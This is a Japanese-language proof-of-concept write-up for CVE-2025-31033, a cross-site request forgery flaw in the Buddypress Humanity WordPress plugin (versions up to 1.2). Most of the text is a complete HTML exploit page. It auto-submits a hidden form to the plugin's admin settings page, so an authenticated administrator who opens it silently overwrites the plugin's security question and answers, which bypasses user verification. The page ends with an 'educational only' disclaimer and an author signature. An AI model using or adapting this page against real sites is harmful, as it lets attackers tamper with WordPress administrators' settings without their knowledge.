
WordPress 用の Buddypress Humanity プラグイン(バージョン <= 1.2)は、クロスサイトリクエストフォージェリ(CSRF) に対して脆弱です。
この脆弱性により、攻撃者は権限の高いユーザー(例:管理者)に、セキュリティの質問や回答などのプラグイン設定を意図せず変更させ、ユーザー検証ロジックを回避させることができます。
bph-settings ページ(管理者のみ)CVE-2025-31033悪用に成功した場合、攻撃者は以下を行うことができます:
buddypress-humanity<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
<form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
<input type="hidden" name="bph_option[bph_title]" value="Nxploited">
<input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
<input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
<input type="hidden" name="bph_submit" value="1">
</form>
</body>
</html>
☠️ このページが認証済みの管理者によって開かれると、プラグイン設定が気付かれずに変更されます。
この概念実証は教育目的のみです。
責任を持って使用し、所有していないシステムでテストしないでください。
著者は、誤用または損害について一切の責任を負いません。
Nxploited | Khaled Alenazi